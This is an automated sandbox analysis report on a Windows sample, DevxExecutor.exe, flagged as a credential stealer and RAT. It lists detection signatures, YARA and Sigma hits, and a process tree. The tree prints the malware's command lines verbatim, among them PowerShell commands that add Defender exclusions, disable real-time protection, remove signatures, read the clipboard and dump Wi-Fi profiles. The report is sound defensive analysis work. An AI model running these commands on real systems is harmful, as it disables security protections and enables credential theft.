
Windows Analysis Report
DevxExecutor.exe

Overview

General Information

Sample name:DevxExecutor.exe
Analysis ID:1439028
MD5:e4897ef7419e128b1f7473119ce0bd07
SHA1:5aad252412a5923438f30cb9c397731a9b020121
SHA256:6d5ba38a5e9bde7939ac5dcb8fdcb970701168064d30abcf518cf8d272a0f581
Tags:exe

Detection

Python Stealer, Blank Grabber, CStealer, Discord Token Stealer, Millenuim RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected Blank Grabber
Yara detected CStealer
Yara detected Discord Token Stealer
Yara detected Millenuim RAT
Yara detected Telegram RAT
Yara detected Telegram Recon
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Drops PE files with benign system names
Encrypted powershell cmdline option found
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Found pyInstaller with non standard icon
Hides threads from debuggers
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies Windows Defender protection settings
Modifies existing user documents (likely ransomware behavior)
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Potentially malicious time measurement code found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Removes signatures from Windows Defender
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious Startup Folder Persistence
Sigma detected: System File Execution Location Anomaly
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses netsh to modify the Windows network and firewall settings
Uses the Telegram API (likely for C&C communication)
Very long command line found
Writes or reads registry keys via WMI
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Yara detected Generic Python Stealer
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: Uncommon Svchost Parent Process
Stores files to the Windows start menu directory
Too many similar processes found
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • DevxExecutor.exe (PID: 320 cmdline: "C:\Users\user\Desktop\DevxExecutor.exe" MD5: E4897EF7419E128B1F7473119CE0BD07)
    • cstealer.exe (PID: 3856 cmdline: "C:\Users\user\AppData\Local\Temp\cstealer.exe" MD5: BC2B7DE582FB94F0C44855D8FAB8C236)
      • cstealer.exe (PID: 6608 cmdline: "C:\Users\user\AppData\Local\Temp\cstealer.exe" MD5: BC2B7DE582FB94F0C44855D8FAB8C236)
        • cmd.exe (PID: 6292 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 2272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cstealer.exe (PID: 1128 cmdline: "C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet MD5: BC2B7DE582FB94F0C44855D8FAB8C236)
            • cstealer.exe (PID: 3292 cmdline: "C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet MD5: BC2B7DE582FB94F0C44855D8FAB8C236)
              • cmd.exe (PID: 5700 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                • conhost.exe (PID: 1776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • cstealer.exe (PID: 5364 cmdline: "C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet MD5: BC2B7DE582FB94F0C44855D8FAB8C236)
                  • cstealer.exe (PID: 2848 cmdline: "C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet MD5: BC2B7DE582FB94F0C44855D8FAB8C236)
                    • cmd.exe (PID: 7448 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                      • conhost.exe (PID: 7472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                      • cstealer.exe (PID: 7788 cmdline: "C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet MD5: BC2B7DE582FB94F0C44855D8FAB8C236)
                        • cstealer.exe (PID: 7880 cmdline: "C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet MD5: BC2B7DE582FB94F0C44855D8FAB8C236)
                          • cmd.exe (PID: 8604 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                            • conhost.exe (PID: 8624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                            • cstealer.exe (PID: 8668 cmdline: "C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet MD5: BC2B7DE582FB94F0C44855D8FAB8C236)
                              • cstealer.exe (PID: 7328 cmdline: "C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet MD5: BC2B7DE582FB94F0C44855D8FAB8C236)
    • main.exe (PID: 6720 cmdline: "C:\Users\user\AppData\Local\Temp\main.exe" MD5: 1EE0837EEDF03E82AA652B1BF157387F)
      • main.exe (PID: 7060 cmdline: "C:\Users\user\AppData\Local\Temp\main.exe" MD5: 1EE0837EEDF03E82AA652B1BF157387F)
        • cmd.exe (PID: 1880 cmdline: C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe -pbeznogym MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 6352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • Build.exe (PID: 2696 cmdline: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe -pbeznogym MD5: A1DDA0E77B597A95DC0D894A4D28780A)
            • hacn.exe (PID: 4768 cmdline: "C:\ProgramData\Microsoft\hacn.exe" MD5: B9F3E6E06F33EE7078F514D41BE5FAAD)
              • hacn.exe (PID: 6284 cmdline: "C:\ProgramData\Microsoft\hacn.exe" MD5: B9F3E6E06F33EE7078F514D41BE5FAAD)
                • cmd.exe (PID: 2284 cmdline: C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe -pbeznogym MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 5136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                    • Conhost.exe (PID: 7476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • s.exe (PID: 6728 cmdline: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe -pbeznogym MD5: 8198AD352AB70C2C974AB5C716956CD7)
                    • main.exe (PID: 7796 cmdline: "C:\ProgramData\main.exe" MD5: 5DF3E2C717F267899F37EC6E8FC7F47A)
                      • cmd.exe (PID: 9112 cmdline: "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp7F1E.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp7F1E.tmp.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                        • conhost.exe (PID: 9124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                        • tasklist.exe (PID: 9184 cmdline: Tasklist /fi "PID eq 7796" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                        • find.exe (PID: 9208 cmdline: find ":" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
                    • svchost.exe (PID: 8076 cmdline: "C:\ProgramData\svchost.exe" MD5: 48B277A9AC4E729F9262DD9F7055C422)
                      • svchost.exe (PID: 8832 cmdline: "C:\ProgramData\svchost.exe" MD5: 48B277A9AC4E729F9262DD9F7055C422)
                        • cmd.exe (PID: 8100 cmdline: C:\Windows\system32\cmd.exe /c "ver" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                    • setup.exe (PID: 8164 cmdline: "C:\ProgramData\setup.exe" MD5: 1274CBCD6329098F79A3BE6D76AB8B97)
            • based.exe (PID: 1472 cmdline: "C:\ProgramData\Microsoft\based.exe" MD5: A71FC3CA1BD1AF148EE4C1BFABCBE0DA)
              • based.exe (PID: 4292 cmdline: "C:\ProgramData\Microsoft\based.exe" MD5: A71FC3CA1BD1AF148EE4C1BFABCBE0DA)
                • cmd.exe (PID: 4128 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 6104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • powershell.exe (PID: 6628 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
                    • Conhost.exe (PID: 7824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • cmd.exe (PID: 5036 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 1080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • powershell.exe (PID: 2172 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)
                • cmd.exe (PID: 5328 cmdline: C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('You are using the wrong Windows version or a VM got detected!', 0, 'Info!', 48+16);close()"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 2696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • mshta.exe (PID: 7188 cmdline: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('You are using the wrong Windows version or a VM got detected!', 0, 'Info!', 48+16);close()" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
                • cmd.exe (PID: 7208 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ??.scr'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 7236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • powershell.exe (PID: 7344 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ??.scr' MD5: 04029E121A0CFA5991749937DD22A1D9)
                • cmd.exe (PID: 7504 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 7560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tasklist.exe (PID: 7728 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                • cmd.exe (PID: 7528 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 7584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tasklist.exe (PID: 7720 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                • cmd.exe (PID: 7904 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 7916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • WMIC.exe (PID: 7956 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
                • cmd.exe (PID: 7968 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 7976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • powershell.exe (PID: 8056 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
                  • Conhost.exe (PID: 5956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • cmd.exe (PID: 8012 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 7704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tasklist.exe (PID: 6612 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                • cmd.exe (PID: 3780 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 8228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • netsh.exe (PID: 8468 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
                • cmd.exe (PID: 1252 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 8236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tree.com (PID: 8428 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
                • cmd.exe (PID: 8196 cmdline: C:\Windows\system32\cmd.exe /c "systeminfo" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 8248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • systeminfo.exe (PID: 8460 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
                • cmd.exe (PID: 8680 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand [base64 (UTF-16) encoded command omitted; it decodes to an Add-Type C# snippet that captures every screen to PNG files]" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 8704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • powershell.exe (PID: 8824 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand [base64 encoded command omitted] MD5: 04029E121A0CFA5991749937DD22A1D9)
                • cmd.exe (PID: 8688 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 8736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tree.com (PID: 8804 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
                • cmd.exe (PID: 8860 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 8904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tree.com (PID: 8980 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
                  • Conhost.exe (PID: 2164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • cmd.exe (PID: 9020 cmdline: C:\Windows\system32\cmd.exe /c "getmac" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 9044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • getmac.exe (PID: 9084 cmdline: getmac MD5: 7D4B72DFF5B8E98DD1351A401E402C33)
                • cmd.exe (PID: 6324 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 8352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tree.com (PID: 8432 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
                • Conhost.exe (PID: 5892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • Conhost.exe (PID: 6324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 7564 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 4760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WmiPrvSE.exe (PID: 7876 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
  • cleanup
Name:DynamicStealer
Description:Dynamic Stealer is a GitHub project written in C# by L1ghtN4n. The code collects passwords and uploads them to Telegram. According to Cyble, Eternity Stealer leverages code from this project, and Jester Stealer could be a rebrand of it.
Attribution:No Attribution
Blogpost URLs:(none)
Link:https://malpedia.caad.fkie.fraunhofer.de/details/win.dynamicstealer
No configs have been found
Source | Rule | Description | Author
C:\Users\user\AppData\Local\Temp\_MEI14722\rarreg.key | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security
C:\ProgramData\main.exe | JoeSecurity_TelegramRecon | Yara detected Telegram Recon | Joe Security
C:\ProgramData\main.exe | JoeSecurity_DiscordTokenStealer | Yara detected Discord Token Stealer | Joe Security
C:\ProgramData\main.exe | JoeSecurity_MillenuimRAT | Yara detected Millenuim RAT | Joe Security
C:\ProgramData\main.exe | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
(6 entries in total)

Source | Rule | Description | Author
00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_GenericPythonStealer | Yara detected Generic Python Stealer | Joe Security
00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CStealer | Yara detected CStealer | Joe Security
00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_GenericPythonStealer | Yara detected Generic Python Stealer | Joe Security
00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CStealer | Yara detected CStealer | Joe Security
00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CStealer | Yara detected CStealer | Joe Security
(51 entries in total)

Source | Rule | Description | Author
46.0.main.exe.16132da05b8.2.raw.unpack | JoeSecurity_DiscordTokenStealer | Yara detected Discord Token Stealer | Joe Security
46.0.main.exe.16132da05b8.2.raw.unpack | JoeSecurity_MillenuimRAT | Yara detected Millenuim RAT | Joe Security
46.0.main.exe.16132da05b8.2.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
46.0.main.exe.16132da05b8.2.raw.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
46.0.main.exe.16132c3ef04.1.raw.unpack | JoeSecurity_DiscordTokenStealer | Yara detected Discord Token Stealer | Joe Security
(7 entries in total)

System Summary

Source: File created, Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe, ProcessId: 6728, TargetFilename: C:\ProgramData\svchost.exe
Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\ProgramData\Microsoft\based.exe" , ParentImage: C:\ProgramData\Microsoft\based.exe, ParentProcessId: 4292, ParentProcessName: based.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'", ProcessId: 4128, ProcessName: cmd.exe
Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\ProgramData\Microsoft\based.exe" , ParentImage: C:\ProgramData\Microsoft\based.exe, ParentProcessId: 4292, ParentProcessName: based.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 5036, ProcessName: cmd.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand [base64 encoded command omitted]
Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand [base64 encoded command omitted]
Source: File created, Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ProgramData\Microsoft\based.exe, ProcessId: 4292, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ??.scr
Source: Process started, Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\ProgramData\svchost.exe" , CommandLine: "C:\ProgramData\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\ProgramData\svchost.exe, NewProcessName: C:\ProgramData\svchost.exe, OriginalFileName: C:\ProgramData\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe -pbeznogym, ParentImage: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe, ParentProcessId: 6728, ParentProcessName: s.exe, ProcessCommandLine: "C:\ProgramData\svchost.exe" , ProcessId: 8076, ProcessName: svchost.exe
Source: Process started, Author: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand [base64 encoded command omitted]
Source: Process started, Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\ProgramData\Microsoft\based.exe" , ParentImage: C:\ProgramData\Microsoft\based.exe, ParentProcessId: 4292, ParentProcessName: based.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", ProcessId: 7968, ProcessName: cmd.exe
